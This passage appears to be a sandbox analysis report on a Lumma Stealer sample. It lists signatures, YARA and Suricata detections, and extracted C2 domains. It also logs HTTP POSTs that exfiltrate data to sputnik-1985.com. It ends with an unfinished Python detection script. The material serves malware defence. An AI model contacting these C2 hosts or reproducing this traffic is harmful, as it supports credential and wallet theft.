
Windows Analysis Report
fghj.exe

Overview

General Information

Sample name: fghj.exe
Analysis ID: 1587452
MD5: 549e550f48b48de65c69c4e87bffaa00
SHA1: ff5914ba3411ba52049f9cec0b7c5267d2f7015a
SHA256: b4129afa37522ee77ca932eb2f29c16df3ad47dc6cc52864ef488fbb537296e2
Tags: exe, user-zhuzhu0009

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • fghj.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\fghj.exe" MD5: 549E550F48B48DE65C69C4E87BFFAA00)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (LummaC): {"C2 url": ["deafeninggeh.biz", "debonairnukk.xyz", "immureprech.biz", "spellshagey.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou"], "Build id": "HpOoIh--2a727a032c4d"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4b0e1:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49; 0x4e677:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T11:47:48.921641+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49815 | 104.102.49.254 | 443 | TCP
2025-01-10T11:47:50.086323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:51.162537+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:52.739731+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49844 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:53.982728+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49850 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:55.356824+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49861 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:56.746110+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49872 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:58.052478+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49878 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:59.062810+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49889 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:50.524034+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:51.650332+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:59.546802+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49889 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:50.524034+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:51.650332+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:48.229945+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 53473 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.166347+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 52857 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.202767+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 54789 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.191793+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 62657 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.180277+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 59047 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.152069+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 52385 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.240914+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 59999 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.139606+0100 | 2058285 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 54554 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:48.218852+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 54826 | 1.1.1.1 | 53 | UDP
2025-01-10T11:47:57.480901+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49872 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:49.440994+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49815 | 104.102.49.254 | 443 | TCP

AV Detection

Source: https://sputnik-1985.com/.msn | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api6Oa2x-M# | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiob | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/&0 | Avira URL Cloud: Label: malware
Source: spellshagey.biz | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH= | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apila | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/ | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apibm | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/04 | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/I3 | Avira URL Cloud: Label: malware
Source: fghj.exe.7372.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "debonairnukk.xyz", "immureprech.biz", "spellshagey.biz", "sordid-snaked.cyou", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "wrathful-jammy.cyou"], "Build id": "HpOoIh--2a727a032c4d"}
Source: fghj.exe | Virustotal: Detection: 66%
Source: fghj.exe | ReversingLabs: Detection: 60%
Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp | String decryptor:
  • sordid-snaked.cyou
  • awake-weaves.cyou
  • wrathful-jammy.cyou
  • debonairnukk.xyz
  • diffuculttan.xyz
  • effecterectz.xyz
  • deafeninggeh.biz
  • immureprech.biz
  • spellshagey.biz
  • lid=%s&j=%s&ver=4.0
  • TeslaBrowser/5.5
  • - Screen Resoluton:
  • - Physical Installed Memory:
  • Workgroup: -
  • HpOoIh--2a727a032c4d
Source: fghj.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49815 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49826 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49844 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49850 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49861 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49872 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49878 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49889 version: TLS 1.2
Source: fghj.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: fghj.exe | Binary string: Morpheme.pdb
Source: C:\Users\user\Desktop\fghj.exe | Code function: 4x nop then the listed instruction (function address in parentheses):
  • movzx edx, byte ptr [edi+ecx] (0_2_00B1B020)
  • cmp dword ptr [esi+edi*8], DDB7C3F3h (0_2_00B3B1B5)
  • jmp eax (0_2_00B171A3)
  • movzx edx, byte ptr [ecx] (0_2_00B1B1A6)
  • mov ebx, eax (0_2_00B07195)
  • mov ebp, eax (0_2_00B07195)
  • movzx edx, byte ptr [esp+ecx-19h] (0_2_00B3F185)
  • cmp dword ptr [eax+ebx*8], B430E561h (0_2_00B271DC)
  • mov ecx, ebx (0_2_00B292A5)
  • mov ecx, eax (0_2_00B1B2F3)
  • movzx ebx, byte ptr [edx] (0_2_00B352E5)
  • cmp dword ptr [eax+ebx*8], B430E561h (0_2_00B271DA)
  • cmp dword ptr [esi+edx*8], 6A2D3EA3h (0_2_00B2420B)
  • mov word ptr [eax], cx (0_2_00B18252)
  • cmp word ptr [ecx+eax+02h], 0000h (0_2_00B1725C)
  • mov word ptr [ecx], dx (0_2_00B1725C)
  • mov word ptr [eax], dx (0_2_00B183D1)
  • cmp dword ptr [edi+edx*8], 1F1F7B79h (0_2_00B1A351)
  • movzx edx, byte ptr [esp+eax+02h] (0_2_00B234B5)
  • mov word ptr [eax], cx (0_2_00B234B5)
  • movzx eax, byte ptr [esp+edi-5D4033FDh] (0_2_00B234B5)
  • movzx edx, byte ptr [esp+ecx-19h] (0_2_00B3F4C5)
  • mov word ptr [eax], cx (0_2_00B1E435)
  • mov word ptr [esi], ax (0_2_00B1E435)
  • mov byte ptr [esi], cl (0_2_00B1D421)
  • movzx ecx, byte ptr [esp+eax+6314EAC3h] (0_2_00B27425)
  • movzx ecx, byte ptr [esp+eax-10h] (0_2_00B27425)
  • movzx edi, byte ptr [eax+esi] (0_2_00B04405)
  • push edi (0_2_00B1E408)
  • mov ebx, dword ptr [edi+04h] (0_2_00B2B475)
  • movzx edx, byte ptr [ebp+ecx+59055C60h] (0_2_00B0B5BA)
  • movzx ecx, byte ptr [esp+eax+2EC34457h] (0_2_00B255E5)
  • mov eax, dword ptr [004454B8h] (0_2_00B2C5C8)
  • mov byte ptr [esi], cl (0_2_00B2D51A)
  • movzx edx, byte ptr [eax] (0_2_00B0E55A)
  • movzx eax, word ptr [edx] (0_2_00B1A545)
  • mov ebx, ecx (0_2_00B1A545)
  • mov word ptr [ebx], cx (0_2_00B1A545)
  • push eax (0_2_00B3C685)
  • movzx edi, byte ptr [esp+ecx] (0_2_00B24785)
  • movzx esi, byte ptr [eax] (0_2_00B0F7C9)
  • jmp eax (0_2_00B28718)
  • mov edx, ecx (0_2_00B1B765)
  • mov byte ptr [ebx], al (0_2_00B2C8B9)
  • mov byte ptr [edi], bl (0_2_00B0A835)
  • movzx ebx, byte ptr [esp+ecx+10h] (0_2_00B3F835)
  • movzx esi, byte ptr [eax] (0_2_00B3F835)
  • mov byte ptr [ebx], al (0_2_00B2C829)
  • mov byte ptr [esi], cl (0_2_00B2D82C)
  • mov byte ptr [ebx], al (0_2_00B2C85B)
  • mov word ptr [edi], cx (0_2_00B239B5)
  • movzx ecx, byte ptr [edi+eax] (0_2_00B0BA8C)
  • jmp eax (0_2_00B16AFB)
  • movzx eax, byte ptr [esp+edx+01h] (0_2_00B0AAC5)
  • lea ecx, dword ptr [eax+77h] (0_2_00B29A11)
  • movzx edx, byte ptr [esp+eax+3Ch] (0_2_00B1CA05)
  • mov edx, ebx (0_2_00B38A05)
  • test eax, eax (0_2_00B38A05)
  • cmp edx, esi (0_2_00B38A05)
  • mov byte ptr [ebx], al (0_2_00B17A77)
  • movzx ecx, byte ptr [edx+eax] (0_2_00B18A5A)
  • mov edi, ebx (0_2_00B2AA40)
  • mov byte ptr [edx], cl (0_2_00B27A46)
  • cmp dword ptr [esi+edx*8], 7C7A349Ah (0_2_00B16BD9)
  • jmp eax (0_2_00B1EB53)
  • mov ecx, eax (0_2_00B28B51)
  • cmp dword ptr [edi+esi*8], B430E561h (0_2_00B16C97)
  • cmp dword ptr [edi+esi*8], B430E561h (0_2_00B16C9C)
  • add eax, dword ptr [esp+ecx*4+20h] (0_2_00B08CF5)
  • movzx ecx, word ptr [ebp+edi*4+00h] (0_2_00B08CF5)
  • cmp dword ptr [esi+edx*8], 1E7AC822h (0_2_00B23DEE)
  • mov ecx, eax (0_2_00B19D16)
  • movzx edi, byte ptr [ebp+eax-29h] (0_2_00B3CD1D)
  • cmp byte ptr [edi+eax+09h], 00000000h (0_2_00B37D75)
  • movzx edx, byte ptr [esp+ecx-19h] (0_2_00B3EE85)
  • mov byte ptr [edi], al (0_2_00B19E54)
  • mov byte ptr [edi], al (0_2_00B19E59)
  • mov word ptr [edx], cx (0_2_00B17E40)
  • movzx edi, byte ptr [esp+edx+000000B8h] (0_2_00B2DFA7)
  • movzx edi, byte ptr [esp+edx+000000B8h] (0_2_00B2DFAC)
  • mov word ptr [eax], cx (0_2_00B21FD5)
  • movzx edi, byte ptr [esp+edx+000000B8h] (0_2_00B2DF34)
  • mov ecx, eax (0_2_00B0EF6D)
  • movzx edi, byte ptr [esp+ecx+00000120h] (0_2_00B0EF6D)
  • mov ecx, dword ptr [esi+40h] (0_2_00B19F6E)

Networking

Source: Network traffic | Suricata IDS: 2058285 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz) : 192.168.2.9:54554 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.9:54789 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.9:52385 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.9:52857 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.9:53473 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.9:59047 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.9:54826 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.9:59999 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.9:62657 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49826 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49889 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49826 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49872 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49815 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49832 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49832 -> 104.21.96.1:443
Source: Malware configuration extractor | URLs:
  • deafeninggeh.biz
  • debonairnukk.xyz
  • immureprech.biz
  • spellshagey.biz
  • sordid-snaked.cyou
  • diffuculttan.xyz
  • effecterectz.xyz
  • awake-weaves.cyou
  • wrathful-jammy.cyou
              Source: DNS query: effecterectz.xyz
              Source: DNS query: diffuculttan.xyz
              Source: DNS query: debonairnukk.xyz
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49815 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49832 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49826 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49844 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49850 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49861 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49872 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49878 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49889 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=93F28NVF3FRCC6S | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12834 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QJOBUM86SESDBVW93 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15064 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=5BM7KYTRHVLKF0TSQY4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20592 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GDDJO2CL1PTZAMGOW | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1231 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=H5JU37N1HB6AHCS | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1109 | Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 121 | Host: sputnik-1985.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: spellshagey.biz
Source: global traffic | DNS traffic detected: DNS query: immureprech.biz
Source: global traffic | DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic | DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic | DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic | DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic | DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic | DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic | DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: sputnik-1985.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sputnik-1985.com
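The HTTP and DNS observations above record what the sample did on the wire, but the report draws no detection logic from them. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sandbox or the malware. It parses observation lines in the form used here and flags the pattern visible above: a tiny form-urlencoded POST to /api followed by multipart uploads to the same host, multipart boundaries that do not match what Chrome itself generates even though the User-Agent claims Chrome/119, a run of lookups across .biz/.xyz/.cyou names, and the Steam profile GET that precedes the C2 traffic. The sample lines are constructed from the report's own entries; the check-in size threshold, the TLD list, the minimum lookup count, and the reading of the profile fetch as a possible dead-drop lookup are assumptions, not facts stated by the report.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of this report's observation lines, with
# " | " separating the Source field, the event and each HTTP header.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

def http_line(method, path, host, ctype=None, length=None):
    """Build one 'HTTP traffic detected' line in the report's header order."""
    hdrs = ["Connection: Keep-Alive"] + (["Content-Type: " + ctype] if ctype else [])
    hdrs += ["User-Agent: " + UA] + (["Content-Length: %d" % length] if length is not None else [])
    hdrs.append("Host: " + host)
    return "Source: global traffic | HTTP traffic detected: %s %s HTTP/1.1 | %s" % (
        method, path, " | ".join(hdrs))

SAMPLE = [
    http_line("GET", "/profiles/76561199724331900", "steamcommunity.com"),
    http_line("POST", "/api", "sputnik-1985.com", "application/x-www-form-urlencoded", 8),
    http_line("POST", "/api", "sputnik-1985.com", "multipart/form-data; boundary=93F28NVF3FRCC6S", 12834),
    http_line("POST", "/api", "sputnik-1985.com", "multipart/form-data; boundary=QJOBUM86SESDBVW93", 15064),
    http_line("POST", "/api", "sputnik-1985.com", "application/x-www-form-urlencoded", 121),
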